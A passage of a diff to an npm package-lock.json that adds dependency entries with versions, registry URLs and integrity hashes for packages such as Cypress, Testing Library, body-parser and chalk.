"^9.0.0" + } + }, + "node_modules/@sideway/formula": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@sideway/formula/-/formula-3.0.1.tgz", + "integrity": "sha512-/poHZJJVjx3L+zVD6g9KgHfYnb443oi7wLu/XKojDviHy6HOEOA6z1Trk5aR1dGcmPenJEgb2sK2I80LeS3MIg==" + }, + 
"node_modules/@sideway/pinpoint": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/@sideway/pinpoint/-/pinpoint-2.0.0.tgz", + "integrity": "sha512-RNiOoTPkptFtSVzQevY/yWtZwf/RxyVnPy/OcA9HBM3MlGDnBEYL5B41H0MTn0Uec8Hi+2qUtTfG2WWZBmMejQ==" + }, + "node_modules/@testing-library/cypress": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/@testing-library/cypress/-/cypress-10.0.1.tgz", + "integrity": "sha512-e8uswjTZIBhaIXjzEcrQQ8nHRWHgZH7XBxKuIWxZ/T7FxfWhCR48nFhUX5nfPizjVOKSThEfOSv67jquc1ASkw==", + "dependencies": { + "@babel/runtime": "^7.14.6", + "@testing-library/dom": "^9.0.0" + }, + "engines": { + "node": ">=12", + "npm": ">=6" + }, + "peerDependencies": { + "cypress": "^12.0.0 || ^13.0.0" + } + }, + "node_modules/@testing-library/dom": { + "version": "9.3.3", + "resolved": "https://registry.npmjs.org/@testing-library/dom/-/dom-9.3.3.tgz", + "integrity": "sha512-fB0R+fa3AUqbLHWyxXa2kGVtf1Fe1ZZFr0Zp6AIbIAzXb2mKbEXl+PCQNUOaq5lbTab5tfctfXRNsWXxa2f7Aw==", + "dependencies": { + "@babel/code-frame": "^7.10.4", + "@babel/runtime": "^7.12.5", + "@types/aria-query": "^5.0.1", + "aria-query": "5.1.3", + "chalk": "^4.1.0", + "dom-accessibility-api": "^0.5.9", + "lz-string": "^1.5.0", + "pretty-format": "^27.0.2" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@types/adm-zip": { + "version": "0.5.5", + "resolved": "https://registry.npmjs.org/@types/adm-zip/-/adm-zip-0.5.5.tgz", + "integrity": "sha512-YCGstVMjc4LTY5uK9/obvxBya93axZOVOyf2GSUulADzmLhYE45u2nAssCs/fWBs1Ifq5Vat75JTPwd5XZoPJw==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/aria-query": { + "version": "5.0.3", + "resolved": "https://registry.npmjs.org/@types/aria-query/-/aria-query-5.0.3.tgz", + "integrity": "sha512-0Z6Tr7wjKJIk4OUEjVUQMtyunLDy339vcMaj38Kpj6jM2OE1p3S4kXExKZ7a3uXQAPCoy3sbrP1wibDKaf39oA==" + }, + "node_modules/@types/node": { + "version": "18.18.8", + "resolved": "https://registry.npmjs.org/@types/node/-/node-18.18.8.tgz", + "integrity": "sha512-OLGBaaK5V3VRBS1bAkMVP2/W9B+H8meUfl866OrMNQqt7wDgdpWPp5o6gmIc9pB+lIQHSq4ZL8ypeH1vPxcPaQ==", + "dependencies": { + "undici-types": "~5.26.4" + } + }, + "node_modules/@types/pdf-parse": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/@types/pdf-parse/-/pdf-parse-1.1.4.tgz", + "integrity": "sha512-+gbBHbNCVGGYw1S9lAIIvrHW47UYOhMIFUsJcMkMrzy1Jf0vulBN3XQIjPgnoOXveMuHnF3b57fXROnY/Or7eg==" + }, + "node_modules/@types/sinonjs__fake-timers": { + "version": "8.1.1", + "resolved": "https://registry.npmjs.org/@types/sinonjs__fake-timers/-/sinonjs__fake-timers-8.1.1.tgz", + "integrity": "sha512-0kSuKjAS0TrGLJ0M/+8MaFkGsQhZpB6pxOmvS3K8FYI72K//YmdfoW9X2qPsAKh1mkwxGD5zib9s1FIFed6E8g==" + }, + "node_modules/@types/sizzle": { + "version": "2.3.5", + "resolved": "https://registry.npmjs.org/@types/sizzle/-/sizzle-2.3.5.tgz", + "integrity": "sha512-tAe4Q+OLFOA/AMD+0lq8ovp8t3ysxAOeaScnfNdZpUxaGl51ZMDEITxkvFl1STudQ58mz6gzVGl9VhMKhwRnZQ==" + }, + "node_modules/@types/uuid": { + "version": "9.0.8", + "resolved": "https://registry.npmjs.org/@types/uuid/-/uuid-9.0.8.tgz", + "integrity": "sha512-jg+97EGIcY9AGHJJRaaPVgetKDsrTgbRjQ5Msgjh/DQKEFl0DtyRr/VCOyD1T2R1MNeWPK/u7JoGhlDZnKBAfA==" + }, + "node_modules/@types/yauzl": { + "version": "2.10.2", + "resolved": "https://registry.npmjs.org/@types/yauzl/-/yauzl-2.10.2.tgz", + "integrity": "sha512-Km7XAtUIduROw7QPgvcft0lIupeG8a8rdKL8RiSyKvlE7dYY31fEn41HVuQsRFDuROA8tA4K2UVL+WdfFmErBA==", + "optional": true, + "dependencies": { + "@types/node": "*" + } + }, + 
"node_modules/accepts": { + "version": "1.3.8", + "resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz", + "integrity": "sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==", + "dependencies": { + "mime-types": "~2.1.34", + "negotiator": "0.6.3" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/adm-zip": { + "version": "0.5.12", + "resolved": "https://registry.npmjs.org/adm-zip/-/adm-zip-0.5.12.tgz", + "integrity": "sha512-6TVU49mK6KZb4qG6xWaaM4C7sA/sgUMLy/JYMOzkcp3BvVLpW0fXDFQiIzAuxFCt/2+xD7fNIiPFAoLZPhVNLQ==", + "engines": { + "node": ">=6.0" + } + }, + "node_modules/aggregate-error": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/aggregate-error/-/aggregate-error-3.1.0.tgz", + "integrity": "sha512-4I7Td01quW/RpocfNayFdFVk1qSuoh0E7JrbRJ16nH01HhKFQ88INq9Sd+nd72zqRySlr9BmDA8xlEJ6vJMrYA==", + "dependencies": { + "clean-stack": "^2.0.0", + "indent-string": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/ansi-colors": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/ansi-colors/-/ansi-colors-4.1.3.tgz", + "integrity": "sha512-/6w/C21Pm1A7aZitlI5Ni/2J6FFQN8i1Cvz3kHABAAbw93v/NlvKdVOqz7CCWz/3iv/JplRSEEZ83XION15ovw==", + "engines": { + "node": ">=6" + } + }, + "node_modules/ansi-escapes": { + "version": "4.3.2", + "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", + "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "dependencies": { + "type-fest": "^0.21.3" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/ansi-regex": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/arch": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/arch/-/arch-2.2.0.tgz", + "integrity": "sha512-Of/R0wqp83cgHozfIYLbBMnej79U/SVGOOyuB3VVFv1NRM/PSFMK12x9KVtiYzJqmnU5WR2qp0Z5rHb7sWGnFQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" + }, + "node_modules/aria-query": { + "version": "5.1.3", + "resolved": "https://registry.npmjs.org/aria-query/-/aria-query-5.1.3.tgz", + "integrity": "sha512-R5iJ5lkuHybztUfuOAznmboyjWq8O6sqNqtK7CLOqdydi54VNbORp49mb14KbWgG1QD3JFO9hJdZ+y4KutfdOQ==", + "dependencies": { + "deep-equal": "^2.0.5" + } + }, + "node_modules/array-buffer-byte-length": { + "version": "1.0.0", + "resolved": 
"https://registry.npmjs.org/array-buffer-byte-length/-/array-buffer-byte-length-1.0.0.tgz", + "integrity": "sha512-LPuwb2P+NrQw3XhxGc36+XSvuBPopovXYTR9Ew++Du9Yb/bx5AzBfrIsBoj0EZUifjQU+sHL21sseZ3jerWO/A==", + "dependencies": { + "call-bind": "^1.0.2", + "is-array-buffer": "^3.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array-flatten": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz", + "integrity": "sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg==" + }, + "node_modules/asn1": { + "version": "0.2.6", + "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", + "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", + "dependencies": { + "safer-buffer": "~2.1.0" + } + }, + "node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/astral-regex": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/astral-regex/-/astral-regex-2.0.0.tgz", + "integrity": "sha512-Z7tMw1ytTXt5jqMcOP+OQteU1VuNK9Y02uuJtKQ1Sv69jXQKKg5cibLwGJow8yzZP+eAc18EmLGPal0bp36rvQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/async": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/async/-/async-3.2.4.tgz", + "integrity": "sha512-iAB+JbDEGXhyIUavoDl9WP/Jj106Kz9DEn1DPgYw5ruDn0e3Wgi3sKFm55sASdGBNOQB8F59d9qQ7deqrHA8wQ==" + }, + "node_modules/async-lock": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/async-lock/-/async-lock-1.4.1.tgz", + "integrity": "sha512-Az2ZTpuytrtqENulXwO3GGv1Bztugx6TT37NIo7imr/Qo0gsYiGtSdBa2B6fsXhTpVZDNfu1Qn3pk531e3q+nQ==" + }, + "node_modules/asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" + }, + "node_modules/at-least-node": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/at-least-node/-/at-least-node-1.0.0.tgz", + "integrity": "sha512-+q/t7Ekv1EDY2l6Gda6LLiX14rU9TV20Wa3ofeQmwPFZbOMo9DXrLbOjFaaclkXKWidIaopwAObQDqwWtGUjqg==", + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/available-typed-arrays": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/available-typed-arrays/-/available-typed-arrays-1.0.5.tgz", + "integrity": "sha512-DMD0KiN46eipeziST1LPP/STfDU0sufISXmjSgvVsoU2tqxctQeASejWcfNtxYKqETM1UxQ8sp2OrSBWpHY6sw==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/aws-sign2": { + "version": "0.7.0", + "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", + "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", + "engines": { + "node": "*" + } + }, + "node_modules/aws4": { + "version": "1.12.0", + "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", + "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" + }, + "node_modules/base64-js": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", + "integrity": 
"sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/bcrypt-pbkdf": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", + "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", + "dependencies": { + "tweetnacl": "^0.14.3" + } + }, + "node_modules/blob-util": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/blob-util/-/blob-util-2.0.2.tgz", + "integrity": "sha512-T7JQa+zsXXEa6/8ZhHcQEW1UFfVM49Ts65uBkFL6fz2QmrElqmbajIDJvuA0tEhRe5eIjpV9ZF+0RfZR9voJFQ==" + }, + "node_modules/bluebird": { + "version": "3.7.2", + "resolved": "https://registry.npmjs.org/bluebird/-/bluebird-3.7.2.tgz", + "integrity": "sha512-XpNj6GDQzdfW+r2Wnn7xiSAd7TM3jzkxGXBGTtWKuSXv1xUV+azxAm8jdWZN06QTQk+2N2XB9jRDkvbmQmcRtg==" + }, + "node_modules/body-parser": { + "version": "1.20.3", + "resolved": "https://registry.npmjs.org/body-parser/-/body-parser-1.20.3.tgz", + "integrity": "sha512-7rAxByjUMqQ3/bHJy7D6OGXvx/MMc4IqBn/X0fcM1QUcAItpZrBEYhWGem+tzXH90c+G01ypMcYJBO9Y30203g==", + "dependencies": { + "bytes": "3.1.2", + "content-type": "~1.0.5", + "debug": "2.6.9", + "depd": "2.0.0", + "destroy": "1.2.0", + "http-errors": "2.0.0", + "iconv-lite": "0.4.24", + "on-finished": "2.4.1", + "qs": "6.13.0", + "raw-body": "2.5.2", + "type-is": "~1.6.18", + "unpipe": "1.0.0" + }, + "engines": { + "node": ">= 0.8", + "npm": "1.2.8000 || >= 1.4.16" + } + }, + "node_modules/body-parser/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/body-parser/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/body-parser/node_modules/qs": { + "version": "6.13.0", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.13.0.tgz", + "integrity": "sha512-+38qI9SOr8tfZ4QmJNplMUxqjbe7LKvvZgWdExBOmd+egZTtjLB67Gu0HRX3u/XOq7UU2Nx6nsjvS16Z9uwfpg==", + "dependencies": { + "side-channel": "^1.0.6" + }, + "engines": { + "node": ">=0.6" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, + "node_modules/buffer-crc32": { + "version": "0.2.13", + "resolved": "https://registry.npmjs.org/buffer-crc32/-/buffer-crc32-0.2.13.tgz", + "integrity": "sha512-VO9Ht/+p3SN7SKWqcrgEzjGbRSJYTx+Q1pTQC0wrWqHx0vpJraQ6GtHx8tvcg1rlK1byhU5gccxgOgj7B0TDkQ==", + "engines": { + "node": "*" + } + }, 
+ "node_modules/bytes": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz", + "integrity": "sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/cachedir": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/cachedir/-/cachedir-2.4.0.tgz", + "integrity": "sha512-9EtFOZR8g22CL7BWjJ9BUx1+A/djkofnyW3aOXZORNW2kxoUpx2h+uN2cOqwPmFhnpVmxg+KW2OjOSgChTEvsQ==", + "engines": { + "node": ">=6" + } + }, + "node_modules/call-bind": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/call-bind/-/call-bind-1.0.5.tgz", + "integrity": "sha512-C3nQxfFZxFRVoJoGKKI8y3MOEo129NQ+FgQ08iye+Mk4zNZZGdjfs06bVTr+DBSlA66Q2VEcMki/cUCP4SercQ==", + "dependencies": { + "function-bind": "^1.1.2", + "get-intrinsic": "^1.2.1", + "set-function-length": "^1.1.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "dependencies": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/call-bound": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/call-bound/-/call-bound-1.0.3.tgz", + "integrity": "sha512-YTd+6wGlNlPxSuri7Y6X8tY2dmm12UMH66RpKMhiX6rsk5wXXnYgbUcOt8kiS31/AjfoTOvCsE+w8nZQLQnzHA==", + "dependencies": { + "call-bind-apply-helpers": "^1.0.1", + "get-intrinsic": "^1.2.6" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/caseless": { + "version": "0.12.0", + "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", + "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" + }, + "node_modules/celebrate": { + "version": "15.0.3", + "resolved": "https://registry.npmjs.org/celebrate/-/celebrate-15.0.3.tgz", + "integrity": "sha512-ToF8ILq/F0KhQ0CPtexP7Cu9GkqKJ91VKy3ZOCV24aaNWdm3QCHqnXAKfKHrtcM2B2zmPFe11p8WWsQkmq8k4g==", + "dependencies": { + "escape-html": "1.0.3", + "joi": "17.x.x", + "lodash": "4.17.x" + } + }, + "node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/check-more-types": { + "version": "2.24.0", + "resolved": "https://registry.npmjs.org/check-more-types/-/check-more-types-2.24.0.tgz", + "integrity": "sha512-Pj779qHxV2tuapviy1bSZNEL1maXr13bPYpsvSDB68HlYcYuhlDrmGd63i0JHMCLKzc7rUSNIrpdJlhVlNwrxA==", + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/ci-info": { + "version": "3.9.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.9.0.tgz", + "integrity": "sha512-NIxF55hv4nSqQswkAeiOi1r83xy8JldOFDTWiug55KBu9Jnblncd2U6ViHmYgHf01TPZS77NJBhBMKdWj9HQMQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "engines": { + "node": ">=8" + } + }, + "node_modules/clean-git-ref": 
{ + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/clean-git-ref/-/clean-git-ref-2.0.1.tgz", + "integrity": "sha512-bLSptAy2P0s6hU4PzuIMKmMJJSE6gLXGH1cntDu7bWJUksvuM+7ReOK61mozULErYvP6a15rnYl0zFDef+pyPw==" + }, + "node_modules/clean-stack": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/clean-stack/-/clean-stack-2.2.0.tgz", + "integrity": "sha512-4diC9HaTE+KRAMWhDhrGOECgWZxoevMc5TlkObMqNSsVU62PYzXZ/SMTjzyGAFF1YusgxGcSWTEXBhp0CPwQ1A==", + "engines": { + "node": ">=6" + } + }, + "node_modules/cli-cursor": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/cli-cursor/-/cli-cursor-3.1.0.tgz", + "integrity": "sha512-I/zHAwsKf9FqGoXM4WWRACob9+SNukZTd94DWF57E4toouRulbCxcUh6RKUEOQlYTHJnzkPMySvPNaaSLNfLZw==", + "dependencies": { + "restore-cursor": "^3.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cli-table3": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/cli-table3/-/cli-table3-0.6.3.tgz", + "integrity": "sha512-w5Jac5SykAeZJKntOxJCrm63Eg5/4dhMWIcuTbo9rpE+brgaSZo0RuNJZeOyMgsUdhDeojvgyQLmjI+K50ZGyg==", + "dependencies": { + "string-width": "^4.2.0" + }, + "engines": { + "node": "10.* || >= 12.*" + }, + "optionalDependencies": { + "@colors/colors": "1.5.0" + } + }, + "node_modules/cli-truncate": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/cli-truncate/-/cli-truncate-2.1.0.tgz", + "integrity": "sha512-n8fOixwDD6b/ObinzTrp1ZKFzbgvKZvuz/TvejnLn1aQfC6r52XEx85FmuC+3HI+JM7coBRXUvNqEU2PHVrHpg==", + "dependencies": { + "slice-ansi": "^3.0.0", + "string-width": "^4.2.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dependencies": { + "color-name": "~1.1.4" + }, + "engines": { + "node": ">=7.0.0" + } + }, + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + }, + "node_modules/colorette": { + "version": "2.0.20", + "resolved": "https://registry.npmjs.org/colorette/-/colorette-2.0.20.tgz", + "integrity": "sha512-IfEDxwoWIjkeXL1eXcDiow4UbKjhLdq6/EuSVR9GMN7KVH3r9gQ83e73hsz1Nd1T3ijd5xv1wcWRYO+D6kCI2w==" + }, + "node_modules/combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "dependencies": { + "delayed-stream": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/commander": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-6.2.1.tgz", + "integrity": "sha512-U7VdrJFnJgo4xjrHpTzu0yrHPGImdsmD95ZlgYSEajAn2JKzDhDTPG9kBTefmObL2w/ngeZnilk+OV9CG3d7UA==", + "engines": { + "node": ">= 6" + } + }, + "node_modules/common-tags": { + "version": "1.8.2", + "resolved": "https://registry.npmjs.org/common-tags/-/common-tags-1.8.2.tgz", + "integrity": "sha512-gk/Z852D2Wtb//0I+kRFNKKE9dIIVirjoqPoA1wJU+XePVXZfGeBpk45+A1rKO4Q43prqWBNY/MiIeRLbPWUaA==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/content-disposition": { + "version": "0.5.4", + 
"resolved": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz", + "integrity": "sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ==", + "dependencies": { + "safe-buffer": "5.2.1" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/content-type": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz", + "integrity": "sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/cookie": { + "version": "0.7.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.7.1.tgz", + "integrity": "sha512-6DnInpx7SJ2AK3+CTUE/ZM0vWTUboZCegxhC2xiIydHR9jNuTAASBrfEpHhiGOZw/nX51bHt6YQl8jsGo4y/0w==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/cookie-signature": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", + "integrity": "sha512-QADzlaHc8icV8I7vbaJXJwod9HWYp8uCqf1xa4OfNu1T7JVxQIrUgOWtHdNDtPiywmFbiS12VjotIXLrKM3orQ==" + }, + "node_modules/core-util-is": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", + "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" + }, + "node_modules/crc-32": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/crc-32/-/crc-32-1.2.2.tgz", + "integrity": "sha512-ROmzCKrTnOwybPcJApAA6WBWij23HVfGVNKqqrZpuyZOHqK2CwHSvpGuyt/UNNvaIjEd8X5IFGp4Mh+Ie1IHJQ==", + "bin": { + "crc32": "bin/crc32.njs" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/cross-spawn": { + "version": "7.0.6", + "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", + "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "dependencies": { + "path-key": "^3.1.0", + "shebang-command": "^2.0.0", + "which": "^2.0.1" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/cypress": { + "version": "13.13.2", + "resolved": "https://registry.npmjs.org/cypress/-/cypress-13.13.2.tgz", + "integrity": "sha512-PvJQU33933NvS1StfzEb8/mu2kMy4dABwCF+yd5Bi7Qly1HOVf+Bufrygee/tlmty/6j5lX+KIi8j9Q3JUMbhA==", + "hasInstallScript": true, + "dependencies": { + "@cypress/request": "^3.0.1", + "@cypress/xvfb": "^1.2.4", + "@types/sinonjs__fake-timers": "8.1.1", + "@types/sizzle": "^2.3.2", + "arch": "^2.2.0", + "blob-util": 